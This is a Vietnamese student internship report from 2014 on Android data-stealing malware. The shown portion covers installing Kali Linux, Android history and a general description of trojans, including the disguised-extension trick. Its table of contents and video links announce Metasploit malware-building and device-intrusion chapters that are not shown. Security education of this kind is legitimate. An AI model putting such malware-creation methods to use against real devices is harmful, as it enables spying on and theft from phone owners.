Embed Size (px)
DESCRIPTION
Báo cáo đề tài "Nghiên cứu các phần mềm cho phép nghe lén trên các thiết bị sử dụng hệ điều hành android" tại Athena
Citation preview
ĐẠI HỌC QUỐC GIA THÀNH PHỐ HỒ CHÍ MINHTRƯỜNG ĐẠI HỌC BÁCH KHOA
KHOA KHOA HỌC & KỸ THUẬT MÁY TÍNH
TRUNG TÂM ĐÀO TẠO QUẢN TRỊ MẠNG & AN NINH
MẠNG QUỐC TẾ ATHENA
BÁO CÁO ĐỀ TÀI THỰC TẬP CNTT
Nghiên cứu các phần mềm cho phép đánh cắp dữ liệu trên các thiết bị di động sử dụng hệ điều hành Android
GVHD: Thầy VÕ ĐỖ THẮNG
SVTH: Lý Khánh Trung
MSSV: 51103866
TPHCM, ngày 11 tháng 08 năm 2014
BÁO CÁO TH C T P – GVHD VÕ Đ TH NGỰ Ậ Ỗ Ắ
TRÍCH YẾUHiện nay, vấn đề “An toàn và bảo mật thông tin” đang ngày càng được
mọi người quan tâm. Với sự phát triển đến chóng mặt của các nền tảng di động
như iOS, Android, Windows Phone cùng với nhiều dòng điện thoại thông minh
xuất hiện như Apple, Samsung, Nokia, HTC,… thì vấn đề bảo mật thông tin ngày
càng được chú trọng. Nếu bạn đang sở hữu một chiếc smartphone, liệu bạn có
đảm bảo là thiết bị của mình không bị nhiễm các phần mềm gián điệp, nghe lén
không? Dựa theo các thống kê gần đây bởi các hãng phần mềm bảo mật hàng
đầu ở Việt Nam như Kaspersky Lab, Norton AV, Avast hay BKAV thì số lượng
smartphone bị nhiễm mã độc ngày càng tăng theo hằng năm. Đặc biệt số người
sử dụng smartphone có hệ điều hành Android tăng lên khá nhanh trong những
năm gần đây luôn là một mảnh đất béo bở cho các Hacker tấn công. Với sự
thiếu hiểu biết của người dùng, luôn thích những gì “free”, ứng ụng free, wifi
free đã vô tình tiếp tay cho các Hacker xâm nhập và cài đặt mã độc trên chính
chiếc điện thoại của họ.
Hôm nay mình viết bài báo cáo về đề tài “Nghiên cứu các phần mềm cho phép đánh cắp dữ liệu trên các thiết bị di động sử dụng hệ điều hành Android” để cùng nghiên cứu, tìm hiểu cách thức hoạt động, chia sẻ thông tin cũng như cung cấp các giải pháp để phòng tránh. Tôi xin cam đoan mọi kết quả đạt được dưới đây là do tôi tự thực hiện dưới sự hướng dẫn của thầy Võ Đỗ Thắng. Danh sách các video hướng dẫn được liệt kê bên dưới:
Giới thiệu bản thân: https://www.youtube.com/watch?v=jDLTLxXzKXI Hướng dẫn cài đặt Kali Linux:
o https://www.youtube.com/watch?v=aE-3faXEpyc Tạo mã độc trên Localhost (Kali Linux):
o https://www.youtube.com/watch?v=eAqN9bfRIKQ Tạo mã độc trên VPS: https://www.youtube.com/watch?v=NuZILKDvaSA Thuận lợi, khó khăn và kết quả đạt được:
o https://www.youtube.com/watch?v=S88NbVlPg1w
SVTT LÝ KHÁNH TRUNG 2
BÁO CÁO TH C T P – GVHD VÕ Đ TH NGỰ Ậ Ỗ Ắ
Lời cảm ơn Đại học Bách Khoa Tp HCM
Em xin chân thành cảm ơn trường Đại học Bách Khoa và Khoa Khoa học và Kĩ thuật Máy tính đã tạo điều kiện tốt để em hoàn thành đợt thực tập này. Trong đợt thực tập này đã cho em những kinh nghiệm quý báu, rất có ích, sẽ giúp em hoàn thiện ơn trong công việc và môi trường làm việc sau này.
Dù cho em đã cố gắng hoàn thành tốt báo cáo thực tập với tất cả nỗ lực của bản thân nhưng do kiến thức cũng như kinh nghiệm chưa nhiều nên sẽ không tránh khỏi thiết sót, rất mong nhận được thông cảm, chia sẻ và tận tình để em hoàn thành báo cáo thực tập tốt hơn.
Một lần nữa em xin chân thành cảm ơn.
Hồ Chí Minh, Ngày 11 Tháng 8 Năm 2014Sinh viên thực tập
Lý Khánh Trung
SVTT LÝ KHÁNH TRUNG 3
BÁO CÁO TH C T P – GVHD VÕ Đ TH NGỰ Ậ Ỗ Ắ
Lời cảm ơn Trung tâm Athena
Em xin chân thành cảm ơn Ban giám đốc Trung Tâm Đào Tạo Quản Trị Mạng và An Ninh Mạng Quốc Tế Athena, thầy Võ Đỗ Thắng và toàn thể các anh chị trong công ty đã tận tình giúp đỡ em trong thời gian thực tập vừa qua, tạo điều kiện để em có cơ hội thực tập tốt tại trung tâm.
Trong đợt thực tập này đã cho em những kinh nghiệm quý báu, rất có ích, sẽ giúp em hoàn thiện ơn trong công việc và môi trường làm việc sau này.
Dù cho em đã cố gắng hoàn thành tốt báo cáo thực tập với tất cả nỗ lực của bản thân nhưng do kiến thức cũng như kinh nghiệm chưa nhiều nên sẽ không tránh khỏi thiết sót, rất mong nhận được thông cảm, chia sẻ và tận tình để em hoàn thành báo cáo thực tập tốt hơn.
Một lần nữa em xin chân thành cảm ơn.
Hồ Chí Minh, Ngày 11 Tháng 8 Năm 2014Sinh viên thực tập
Lý Khánh Trung
Hình chụp GVHD Võ Đỗ Thắng (trái) và SVTT Lý Khánh Trung (phải)
SVTT LÝ KHÁNH TRUNG 4
BÁO CÁO TH C T P – GVHD VÕ Đ TH NGỰ Ậ Ỗ Ắ
NHẬN XÉT CỦA KHOA
....................................................................................................................................
....................................................................................................................................
....................................................................................................................................
....................................................................................................................................
....................................................................................................................................
....................................................................................................................................
....................................................................................................................................
....................................................................................................................................
....................................................................................................................................
....................................................................................................................................
....................................................................................................................................
....................................................................................................................................
....................................................................................................................................
....................................................................................................................................
....................................................................................................................................
....................................................................................................................................
....................................................................................................................................
....................................................................................................................................
....................................................................................................................................
....................................................................................................................................
....................................................................................................................................
....................................................................................................................................
TPHCM, ngày ... tháng ... năm 2014
Tr ng Khoaưở
SVTT LÝ KHÁNH TRUNG 5
BÁO CÁO TH C T P – GVHD VÕ Đ TH NGỰ Ậ Ỗ Ắ
NHẬN XÉT CỦA CÔNG TY THỰC TẬP
....................................................................................................................................
....................................................................................................................................
....................................................................................................................................
....................................................................................................................................
....................................................................................................................................
....................................................................................................................................
....................................................................................................................................
....................................................................................................................................
....................................................................................................................................
....................................................................................................................................
....................................................................................................................................
....................................................................................................................................
....................................................................................................................................
....................................................................................................................................
....................................................................................................................................
....................................................................................................................................
....................................................................................................................................
....................................................................................................................................
....................................................................................................................................
....................................................................................................................................
....................................................................................................................................
....................................................................................................................................
TPHCM, ngày ... tháng ... năm 2014
Giám đ cố
SVTT LÝ KHÁNH TRUNG 6
BÁO CÁO TH C T P – GVHD VÕ Đ TH NGỰ Ậ Ỗ Ắ
NHẬN XÉT CỦA GIÁO VIÊN HƯỚNG DẪN
....................................................................................................................................
....................................................................................................................................
....................................................................................................................................
....................................................................................................................................
....................................................................................................................................
....................................................................................................................................
....................................................................................................................................
....................................................................................................................................
....................................................................................................................................
....................................................................................................................................
....................................................................................................................................
....................................................................................................................................
....................................................................................................................................
....................................................................................................................................
....................................................................................................................................
....................................................................................................................................
....................................................................................................................................
....................................................................................................................................
....................................................................................................................................
....................................................................................................................................
....................................................................................................................................
....................................................................................................................................
TPHCM, ngày ... tháng ... năm 2014
Giáo viên h ng d nướ ẫ
SVTT LÝ KHÁNH TRUNG 7
BÁO CÁO TH C T P – GVHD VÕ Đ TH NGỰ Ậ Ỗ Ắ
Mục lụcTRÍCH Y UẾ .....................................................................................................................................................2
L i c m n Đ i h c Bách Khoa Tp HCMờ ả ơ ạ ọ ...........................................................................................3
L i c m n Trung tâm Athenaờ ả ơ ..............................................................................................................4
NH N XÉT C A KHOAẬ Ủ .............................................................................................................................5
NH N XÉT C A CÔNG TY TH C T PẬ Ủ Ự Ậ ..............................................................................................6
NH N XÉT C A GIÁO VIÊN H NG D NẬ Ủ ƯỚ Ẫ .....................................................................................7
M c l cụ ụ ............................................................................................................................................................8
CH NG 1: GI I THI U V ATHENAƯƠ Ớ Ệ Ề .............................................................................................9
1.1. Lĩnh v c ho t đ ng chínhự ạ ộ ..........................................................................................................9
1.2. Đ i ngũ gi ng viênộ ả ......................................................................................................................10
1.3. C s v t ch tơ ở ậ ấ ..............................................................................................................................10
1.4. D ch v h trị ụ ỗ ợ..............................................................................................................................10
CH NG 2: N I DUNG TH C T PƯƠ Ộ Ự Ậ ................................................................................................12
2.1 Th c hi n trên Localhostự ệ .........................................................................................................12
2.1.1 Gi i thi u h đi u hành Kali Linuxớ ệ ệ ề .............................................................................12
2.1.2 H ng d n cài đ t h đi u hành Kali Linux trên Vmwareướ ẫ ặ ệ ề ..............................13
2.1.3 Gi i thi u h đi u hành Androidớ ệ ệ ề .................................................................................27
2.1.4 Gi i thi u s l c v trojan và malwareớ ệ ơ ượ ề ..................................................................28
2.1.5 T o mã đ c trên Kali Linuxạ ộ ............................................................................................31
2.1.6 Xâm nh p SDcard c a thi t b Android b nhi mậ ủ ế ị ị ễ ................................................39
2.2 Th c hi n trên Virtual Private Server – VPSự ệ ...................................................................41
2.2.1 Gi i thi u v VPSớ ệ ề .................................................................................................................41
2.2.2 H ng d n cài đ t Metasploit đ t o mã đ c trên VPSướ ẫ ặ ể ạ ộ ....................................42
2.2.3 Ti n hành xâm nh p thi t b Android t VPSế ậ ế ị ừ .......................................................48
CH NG 3: T NG K TƯƠ Ổ Ế ........................................................................................................................52
SVTT LÝ KHÁNH TRUNG 8
BÁO CÁO TH C T P – GVHD VÕ Đ TH NGỰ Ậ Ỗ Ắ
CHƯƠNG 1: GIỚI THIỆU VỀ ATHENA
Trung Tâm Đào Tạo Quản Trị Mạng & An Ninh Mạng Quốc Tế ATHENA được
thành lập từ năm 2004, là một tổ chức qui tụ nhiều trí thức trẻ Việt Nam đầy năng
động, nhiệt huyết và kinh nghiệm trong lãnh vực CNTT, với tâm huyết góp phần
vào công cuộc thúc đẩy tiến trình đưa công nghệ thông tin là ngành kinh tế mũi
nhọn, góp phần phát triển nước nhà.
1.1. Lĩnh vực hoạt động chính
Trung tâm ATHENA đã và đang tập trung chủ yếu vào đào tạo chuyên sâu
quản trị mạng, an ninh mạng, thương mại điện tử theo các tiêu chuẩn quốc tế của
các hãng nổi tiếng như Microsoft, Cisco, Oracle, Linux LPI , CEH,... Song song đó,
trung tâm ATHENA còn có những chương trình đào tạo cao cấp dành riêng theo
đơn đặt hàng của các đơn vị như Bộ Quốc Phòng, Bộ Công An , ngân hàng, doanh
nghiệp, các cơ quan chính phủ, tổ chức tài chính..
Sau gần 10 năm hoạt động, nhiều học viên tốt nghiệp trung
tâm ATHENA đã là chuyên gia đảm nhận công tác quản lý hệ thống mạng, an ninh
mạng cho nhiều bộ ngành như Cục Công Nghệ Thông Tin - Bộ Quốc Phòng , Bộ
Công An, Sở Thông Tin Truyền Thông các tỉnh, bưu điện các tỉnh,...
Ngoài chương trình đào tạo, Trung tâm ATHENA còn có nhiều chương trình
hợp tác và trao đổi công nghệ với nhiều đại học lớn như đại học Bách Khoa Thành
Phố Hồ Chí Minh, Học Viện An Ninh Nhân Dân (Thủ Đức), Học Viện Bưu Chính
Viễn Thông, Hiệp hội an toàn thông tin (VNISA), Viện Kỹ Thuật Quân Sự ,..
SVTT LÝ KHÁNH TRUNG 9
BÁO CÁO TH C T P – GVHD VÕ Đ TH NGỰ Ậ Ỗ Ắ
1.2. Đội ngũ giảng viên
Tất cả các giảng viên trung tâm ATHENA có đều tốt nghiệp từ các trường
đại học hàng đầu trong nước như Đại Học Bách Khoa, Đại Học Khoa Học Tự
Nhiên,....Tất cả giảng viên ATHENA đều phải có các chứng chỉ quốc tế như MCSA,
MCSE, CCNA, CCNP, Security+, CEH,có bằng sư phạm Quốc tế (Microsoft Certified
Trainer). Đây là các chứng chỉ chuyên môn bắt buộc để đủ điều kiện tham gia
giảng dạy tại trung tâm ATHENA.
Bên cạnh đó, Các giảng viên ATHENA thường đi tu nghiệp và cập nhật kiến
thức công nghệ mới từ các nước tiên tiến như Mỹ , Pháp, Hà Lan, Singapore,...
và truyền đạt các công nghệ mới này trong các chương trình đào tạo tại trung
tâm ATHENA
1.3. Cơ sở vật chất
Thiết bị đầy đủ và hiện đại
Chương trình cập nhật liên tục, bảo đảm học viên luôn tiếp cận với những
công nghệ mới nhất.
Phòng máy rộng rãi, thoáng mát
1.4. Dịch vụ hỗ trợ
Đảm bảo việc làm cho học viên tốt nghiệp khoá dài hạn
Giới thiệu việc làm cho mọi học viên
SVTT LÝ KHÁNH TRUNG 10
BÁO CÁO TH C T P – GVHD VÕ Đ TH NGỰ Ậ Ỗ Ắ
Ngoài giờ học chính thức, học viên được thực hành thêm miễn phí, không
giới hạn thời gian.
Hỗ trợ kỹ thuật không thời hạn trong tất cả các lĩnh vực liên quan đến máy
tính, mạng máy tính, bảo mật mạng
Cơ sở 1: 92 Nguyễn Đình Chiểu, P.Đa Kao, Q.1
Điện thoại: (08)38244041 - 090 78 79 477-094 323 00 99 (Gần ngã tư Đinh Tiên
Hoàng - Nguyễn Đình Chiểu).
Cơ sở 2: 2 Bis Đinh Tiên Hoàng, P.Đa Kao, Q.1.
Điện thoại: (08)22103801 - 094 320 00 88(Cạnh sân vận động Hoa Lư – Cách đài
truyền hình Tp HTV 50 mét).
Website: http://athena.edu.vn - http://athena.com.vn
E-mail : [email protected] - [email protected]
SVTT LÝ KHÁNH TRUNG 11
BÁO CÁO TH C T P – GVHD VÕ Đ TH NGỰ Ậ Ỗ Ắ
CHƯƠNG 2: NỘI DUNG THỰC TẬP
2.1 Thực hiện trên Localhost
2.1.1 Giới thiệu hệ điều hành Kali LinuxKali Linux là một hệ điều hành được xây dựng trên nhân Linux, được thiết
kế để kiểm tra bảo mật, thử nghiệm xâm nhập các hệ thống máy tính. Tiền thân
của Kali Linux là BackTrack, xuất hiện năm 2006 và được các chuyên gia đánh giá
bảo mật ưa chuộng sử dụng. Sau 7 năm liên tục phát triển, tháng 3 năm 2013,
hãng Offensive Security đã công bố phiên bản mới của BackTrack có tên là Kali
Linux (được xem như phiên bản BackTrack 6). Kali Linux tập hợp và phân loại gần
như tất cả các công cụ thiết yếu mà bất kì chuyên gia đánh giá bảo mật nào cũng
cần sử dụng khi tác nghiệp.
Nói về ưu điểm của Kali là nói về những thay đổi giữa BackTrack và Kali.
So với BackTrack, Kali có rất nhiều cải tiến:
Kali phát triển trên nền tảng hệ điều hành Debian
Điều này có nghĩa Kali có rất nhiều ưu điểm. Đầu tiên là các Repository (Kho
lưu trữ phần mềm) được đồng bộ hóa với các Repository của Debian nên có thể
dễ dàng có được các bản cập nhật vá lỗi bảo mật mới nhất và các cập nhật
Repository. Duy trì cập nhật (up-to-date) đối với các công cụ Penetration Test là
một yêu cầu vô cùng quan trọng.
Một lợi thế khác là mọi công cụ trong Kali đều tuân theo chính sách quản lý
gói của Debian. Điều này có vẻ không quan trọng nhưng nó đảm bảo rõ ràng về
mặt cấu trúc hệ thống tổng thể, nó cũng giúp cho chúng ta có thể dễ dàng hơn
trong việc xem xét hoặc thay đổi mã nguồn của các công cụ.
SVTT LÝ KHÁNH TRUNG 12
BÁO CÁO TH C T P – GVHD VÕ Đ TH NGỰ Ậ Ỗ Ắ
Tính tương thích kiến trúc
Một ưu điểm quan trọng trong Kali là nó đã cải tiến khả năng tương thích
với kiến trúc ARM. Từ khi Kali xuất hiện, nhiều phiên bản ấn tượng đã được tạo
ra. Giờ đây ta có thể build Kali trên một Raspberry Pi hoặc trên Samsung Galaxy
Note.
Hỗ trợ mạng không dây tốt hơn
Một trong những vấn đề được các nhà phát triển Kali chú trọng nhiều nhất,
chính là sự hỗ trợ cho một số lượng lớn phần cứng bên trong các thiết bị mạng
không dây hay USB Dongles. Một yêu cầu quan trọng khi các chuyên gia bảo mật
thực hiện đánh giá mạng không dây.
Khả năng tùy biến cao
Kali rất linh hoạt khi đề cập đến giao diện hoặc khả năng tuỳ biến hệ thống.
Đối với giao diện, giờ đây người dùng đã có thể chọn cho mình nhiều loại
Desktops như GNOME, KDE hoặc XFCE tùy theo sở thích và thói quen sử dụng.
Dễ dàng nâng cấp giữa các phiên bản Kali trong tương lai
Đối với bất cứ ai sử dụng Kali, đây là một tính năng quan trọng khi bảo trì
hệ điều hành Kali. Với BackTrack, bất kỳ lúc nào khi phiên bản mới được công bố
thì chúng ta đều phải cài lại mới hoàn toàn (Ngoại trừ phiên bản R2 lên R3 năm
ngoái).
Giờ đây với Kali, nhờ vào sự chuyển đổi sang nền tảng hệ điều hành Debian, Kali đã dễ dàng hơn trong việc âng cấp hệ thống khi phiên bản mới xuất hiện, người dùng không phải cài lại mới hoàn toàn nữa
2.1.2 Hướng dẫn cài đặt hệ điều hành Kali Linux trên VmwareTrước tiên các bạn có thể tải tập tin dạng iso phiên bản mới nhất của Kali
Linux ở liên kết http://www.kali.org/downloads/ , ở đây ta sẽ cài phiên bản Kali Linux 1.0.7 64bit.
SVTT LÝ KHÁNH TRUNG 13
BÁO CÁO TH C T P – GVHD VÕ Đ TH NGỰ Ậ Ỗ Ắ
Nếu là dân công nghệ thì ít nhiều bạn sẽ biết đến phần mềm có tên là
Vmware. Vmware Worktration là phần mềm tạo máy ảo hàng đầu, rất được ưa
chuộng hiện nay. Bạn có thể dùng Vmware để tạo một máy tính ảo chạy Windows
, Linux hay thậm chí là Android nữa. VMware Workstation 10 là một phần mềm
giả lập hệ điều hành để bàn rất nổi tiếng của hãng VMware Inc. Với hơn 50 tính
năng mới, có thể thay đổi đáng kể cách thức làm việc với các máy ảo.
Từ Giao diện chính của Vmware thì nhấn vào File -> New Vitual Machine (hoặc dùng phím tắt Crtl + N).
Chọn Typical và nhấn next. Đây là những cài đặt mà Vmware khuyên dùng nếu muốn tự thiết lập những tùy chọn thì nhấn vào Custom. Nếu không rành thì tốt nhất cứ chọn Typical đỡ phiền sau này. Ở đây mình chọn Custom và nhấn next.
SVTT LÝ KHÁNH TRUNG 14
BÁO CÁO TH C T P – GVHD VÕ Đ TH NGỰ Ậ Ỗ Ắ
Tích vào Installer Disc image file. Và chọn đến file ISO cần cài đặt Vmware sẽ tự nhận diện đó là file iso của hệ điều hành nào. Và sẽ bắt nhập Product Key( Có thể nhập sau cũng được)
SVTT LÝ KHÁNH TRUNG 15
BÁO CÁO TH C T P – GVHD VÕ Đ TH NGỰ Ậ Ỗ Ắ
Sau đó sẽ chọn tên máy ảo và nơi lưu trữ dữ liệu của nó
Ở những bước sau thì cứ nhấn Next. Đến đây thì có 1 tùy chọn là ”Customize Hardware…”. Cái này để thay đổi các thông số như dung lượng RAM (cá nhân mình thì đề nghị nên sử dụng chỉ 512MB), Ổ cứng, USb Controler…
Cũng tùy vào hệ điều hành đang cài mà chọn dung lượng cho phù hợp. Vmware cũng đã chọn cho mình 1 dung lượng phù hợp rồi.
SVTT LÝ KHÁNH TRUNG 16
BÁO CÁO TH C T P – GVHD VÕ Đ TH NGỰ Ậ Ỗ Ắ
Sau khi hoàn thành các bước này thì máy ảo sẽ tự động bật và sẽ tiến hành cài đặt 1 cách tự động. Tùy vào dung lượng mà quá trình sẽ diễn ra nhanh hay chậm thông thường thì mất vài chục phút cho đến vài giờ. Tuy nhiên với những file ISO không hỗ trợ nhận diện tự động thì bạn vẫn sẽ phải cài bằng tay từng bước như cài win bình thường.
Bạn sẽ nhìn thấy màn hình khởi động của Kali. Chọn một trong hai chế độ cài đặt là Graphical hoặc Text-Mode. Trong bài viết này tôi sẽ chọn Graphical Install
SVTT LÝ KHÁNH TRUNG 17
BÁO CÁO TH C T P – GVHD VÕ Đ TH NGỰ Ậ Ỗ Ắ
Chọn ngôn ngữ, vị trí đất nước của bạn sau đó click Continue
SVTT LÝ KHÁNH TRUNG 18
BÁO CÁO TH C T P – GVHD VÕ Đ TH NGỰ Ậ Ỗ Ắ
Bạn cũng sẽ được yêu cầu để cấu hình bàn phím với bàn phím bạn đang sử dụng.
SVTT LÝ KHÁNH TRUNG 19
BÁO CÁO TH C T P – GVHD VÕ Đ TH NGỰ Ậ Ỗ Ắ
Bạn sẽ cần phải cấu hình Network và Password cho tài khoản Root, thiết lập giờ.
SVTT LÝ KHÁNH TRUNG 20
BÁO CÁO TH C T P – GVHD VÕ Đ TH NGỰ Ậ Ỗ Ắ
Tiếp đến bạn sẽ lựa chọn ổ đĩa bạn sẽ cài đặt Kali.
SVTT LÝ KHÁNH TRUNG 21
BÁO CÁO TH C T P – GVHD VÕ Đ TH NGỰ Ậ Ỗ Ắ
SVTT LÝ KHÁNH TRUNG 22
BÁO CÁO TH C T P – GVHD VÕ Đ TH NGỰ Ậ Ỗ Ắ
SVTT LÝ KHÁNH TRUNG 23
BÁO CÁO TH C T P – GVHD VÕ Đ TH NGỰ Ậ Ỗ Ắ
Sau khi cấu hình Partition xong, nhấn Continue để quá trình cài đặt bắt đầu.
Cấu hình Mirror. Kali sử dụng một kho lưu trữ trung tâm để phân phối các ứng dụng. Bạn sẽ cần phải nhập thông tin proxy thích hợp khi cần thiết. Chú ý: Nếu bạn chọn “No” trong màn hình này, bạn sẽ không thể cài đặt các gói từ kho lưu trữ của Kali.
SVTT LÝ KHÁNH TRUNG 24
BÁO CÁO TH C T P – GVHD VÕ Đ TH NGỰ Ậ Ỗ Ắ
Tiếp đến là cài đặt GRUB
Cuối cùng, nhấp vào Continue để khởi động lại Kali.
SVTT LÝ KHÁNH TRUNG 25
BÁO CÁO TH C T P – GVHD VÕ Đ TH NGỰ Ậ Ỗ Ắ
Màn hình đăng nhập và sau khi bạn đăng nhập vào Kali.
Giao diện sau khi cài đặt xong:
Tới đây ta đã cài đặt thành công!!!
SVTT LÝ KHÁNH TRUNG 26
BÁO CÁO TH C T P – GVHD VÕ Đ TH NGỰ Ậ Ỗ Ắ
2.1.3 Giới thiệu hệ điều hành AndroidAndroid là một hệ điều hành dựa trên nền tảng Linux được thiết kế dành
cho các thiết bị di động có màn hình cảm ứng như điện thoại thông minh và máy tính bảng. Ban đầu, Android được phát triển bởi Tổng công ty Android, với sự hỗ trợ tài chính từ Google và sau này được chính Google mua lại vào năm 2005. Android ra mắt vào năm 2007 cùng với tuyên bố thành lập Liên minh thiết bị cầm tay mở: một hiệp hội gồm các công ty phần cứng, phần mềm, và viễn thông với mục tiêu đẩy mạnh các tiêu chuẩn mở cho các thiết bị di động. Chiếc điện thoại đầu tiên chạy Android được bán vào tháng 10 năm 2008.
Lịch sử:
Tổng công ty Android (Android, Inc.) được thành lập tại Palo Alto, California vào tháng 10 năm 2003 bởi Andy Rubin (đồng sáng lập công ty Danger), Rich Miner (đồng sáng lập Tổng công ty Viễn thông Wildfire), Nick Sears (từng là Phó giám đốc T-Mobile), và Chris White (trưởng thiết kế và giao diện tại WebTV) để phát triển, theo lời của Rubin, "các thiết bị di động thông minh hơn có thể biết được vị trí và sở thích của người dùng". Dù những người thành lập và nhân viên đều là những người có tiếng tăm, Tổng công ty Android hoạt động một cách âm thầm, chỉ tiết lộ rằng họ đang làm phần mềm dành cho điện thoại di động. Trong năm đó, Rubin hết kinh phí. Steve Perlman, một người bạn thân của Rubin, mang cho ông 10.000 USD tiền mặt nhưng từ chối tham gia vào công ty.
Google mua lại Tổng công ty Android vào ngày 17 tháng 8 năm 2005, biến nó thành một bộ phận trực thuộc Google. Những nhân viên của chủ chốt của Tổng công ty Android, gồm Rubin, Miner và White, vẫn tiếp tục ở lại công ty làm việc sau thương vụ này. Vào thời điểm đó không có nhiều thông tin về Tổng công ty, nhưng nhiều người đồn đoán rằng Google dự tính tham gia thị trường điện thoại di động sau bước đi này. Tại Google, nhóm do Rubin đứng đầu đã phát triển một nền tảng thiết bị di động phát triển trên nền nhân Linux. Google quảng bá nền tảng này cho các nhà sản xuất điện thoại và các nhà mạng với lời hứa sẽ cung cấp một hệ thống uyển chuyển và có khả năng nâng cấp. Google đã liên hệ với hàng loạt hãng phần cứng cũng như đối tác phần mềm, bắn tin cho các nhà mạng rằng họ sẵn sàng hợp tác với các cấp độ khác nhau.
Ngày càng nhiều suy đoán rằng Google sẽ tham gia thị trường điện thoại di động xuất hiện trong tháng 12 năm 2006. Tin tức của BBC và Nhật báo phố Wall chú thích rằng Google muốn đưa công nghệ tìm kiếm và các ứng dụng của họ vào điện thoại di động và họ đang nỗ lực làm việc để thực hiện điều này. Các phương tiện truyền thông truyền thống lẫn online cũng viết về tin đồn rằng Google đang phát triển một thiết bị cầm tay mang thương hiệu Google. Một vài tờ báo còn nói rằng
SVTT LÝ KHÁNH TRUNG 27
BÁO CÁO TH C T P – GVHD VÕ Đ TH NGỰ Ậ Ỗ Ắ
trong khi Google vẫn đang thực hiện những bản mô tả kỹ thuật chi tiết, họ đã trình diễn sản phẩm mẫu cho các nhà sản xuất điện thoại di động và nhà mạng. Tháng 9 năm 2007, InformationWeek đăng tải một nghiên cứu của Evalueserve cho biết Google đã nộp một số đơn xin cấp bằng sáng chế trong lĩnh vực điện thoại di động.
Ngày 5/11/2007, Liên minh thiết bị cầm tay mở (Open Handset Alliance), một hiệp hội bao gồm nhiều công ty trong đó có Texas Instruments,Tập đoàn Broadcom, Google, HTC, Intel, LG, Tập đoàn MarvellTechnology, Motorola, Nvidia, Qualcomm, Samsung Electronics, Sprint Nextel và T-Mobile được thành lập với mục đích phát triển các tiêu chuẩn mở cho thiết bị di động. Cùng ngày, Android cũng được ra mắt với vai trò là sản phẩm đầu tiên của Liên minh, một nền tảng thiết bị di động được xây dựng trên nhân Linux phiên bản 2.6. Chiếc điện thoại chạy Android đầu tiên được bán ra là HTC Dream, phát hành ngày 22 tháng 10 năm 2008. Biểu tượng của hệ điều hành Android mới là một con rôbốt màu xanh lá cây do hãng thiết kế Irina Blok tại California vẽ.
Từ năm 2008, Android đã trải qua nhiều lần cập nhật để dần dần cải tiến hệ điều hành, bổ sung các tính năng mới và sửa các lỗi trong những lần phát hành trước. Mỗi bản nâng cấp được đặt tên lần lượt theo thứ tự bảng chữ cái, theo tên của một món ăn tráng miệng; ví dụ như phiên bản 1.5 Cupcake (bánh bông lan nhỏ có kem) tiếp nối bằng phiên bản 1.6 Donut (bánh vòng). Phiên bản mới nhất (chính thức) là 4.4 KitKat (bánh chocolate). Vào năm 2010, Google ra mắt loạt thiết bị Nexus - một dòng sản phẩm bao gồm điện thoại thông minh và máy tính bảng chạy hệ điều hành Android, do các đối tác phần cứng sản xuất. HTC đã hợp tác với Google trong chiếc điện thoại thông minh Nexus đầu tiên, Nexus One. Kể từ đó nhiều thiết bị mới hơn đã gia nhập vào dòng sản phẩm này, như điện thoại Nexus 4 và máy tính bảng Nexus 10, lần lượt do LG và Samsung sản xuất. Google xem điện thoại và máy tính bảng Nexus là những thiết bị Android chủ lực của mình, với những tính năng phần cứng và phần mềm mới nhất của Android.
2.1.4 Giới thiệu sơ lược về trojan và malwareTrojan:
Định nghĩa: Trojan horse, tiếng Anh của Ngựa Troia, là một loại phần mềm ác tính. Không giống như virus, nó không có chức năng tự sao chép nhưng lại có chức năng hủy hoại tương tự virus. Một trong những thứ giăng bẫy của Ngựa Troia là nó tự nhận là giúp cho máy
SVTT LÝ KHÁNH TRUNG 28
BÁO CÁO TH C T P – GVHD VÕ Đ TH NGỰ Ậ Ỗ Ắ
của thân chủ chống lại các virus nhưng thay vì làm vậy nó quay ra đem virus vào máy.
Đặc điểm: o Trojan horse là chương trình máy tính thường ẩn mình dưới dạng một
chương trình hữu ích và có những chức năng mong muốn, hay ít nhất chúng trông như có các tính năng này. Một cách bí mật, nó lại tiến hành các thao tác khác không mong muốn. Những chức năng mong muốn chỉ là phần bề mặt giả tạo nhằm che giấu cho các thao tác này.
o Trong thực tế, nhiều Trojan horse chứa đựng các phần mềm gián điệp nhằm cho phép máy tính thân chủ bị điều khiển từ xa qua hệ thống mạng.
o Khác nhau căn bản với virus máy tính là Trojan Horse về mặt kỹ thuật chỉ là một phần mềm thông thường và không có ý nghĩa tự lan truyền. Các chương trình này chỉ lừa người dùng để tiến hành các thao tác khác mà thân chủ sẽ không tự nguyện cho phép tiến hành. Ngày nay, các Trojan horse đã được thêm vào đó các chức năng tự phân tán. Điều này đẩy khái niện Trojan horse đến gần với khái niệm virus và chúng trở thành khó phân biệt.
Các kiểu gây hại:o Xoá hay viết lại các dữ liệu trên máy tínho Làm hỏng chức năng của các tệpo Lây nhiễm các phần mềm ác tính khác như là viruso Cài đặt mạng để máy có thể bị điều khiển bởi máy khác hay dùng máy
nhiễm để gửi thư nhũng lạmo Đọc lén các thông tin cần thiết và gửi báo cáo đến nơi khác (xem
thêm phần mềm gián điệp)o Ăn cắp thông tin như là mật khẩu và số thẻ tín dụngo Cài đặt lén các phần mềm chưa được cho phép
Các kiểu tấn công:
o Trên các máy Microsoft Windows, người tấn công có thể đính kèm một Trojan horse vào một cái tên có vẻ lương thiện vào trong một thư điện tử với việc khuyến dụ người đọc mở đính kèm ra. Trojan horse thường là các tệp khả thi trên Windows và do đó sẽ có các đuôi như là.exe,.com,.scr,.bat, hay.pif. Trong nhiều ứng dụng của Windows đã có cấu hình mặc định không cho phép hiển thị các đuôi này. Do đó, nếu một Trojan horse có tên chẳng hạn là "Readme.txt.exe" thì tệp này sẽ hiển thị
SVTT LÝ KHÁNH TRUNG 29
BÁO CÁO TH C T P – GVHD VÕ Đ TH NGỰ Ậ Ỗ Ắ
một cách mặc định thành "Readme.txt" và nó sẽ đánh lừa người dùng rằng đây chỉ là một loại hồ sơ văn bản không thể gây hại.
o Các biểu tượng cũng có thể được gán với các loại tệp khác nhau và có thể
được đính kèm vào thư điện tử. Khi người dùng mở các biểu tượng này thì các Trojan horse ẩn giấu sẽ tiến hành những tác hại bất ngờ. Hiện nay, các Trojan horse không chỉ xoá các tệp, bí mật điều chỉnh cấu hình của máy tính bị nhiễm mà còn dùng máy này như là một cơ sở để tấn công các máy khác trong mạng.
o Lợi dụng một số lỗi của trình duyệt web, chẳng hạn như Internet
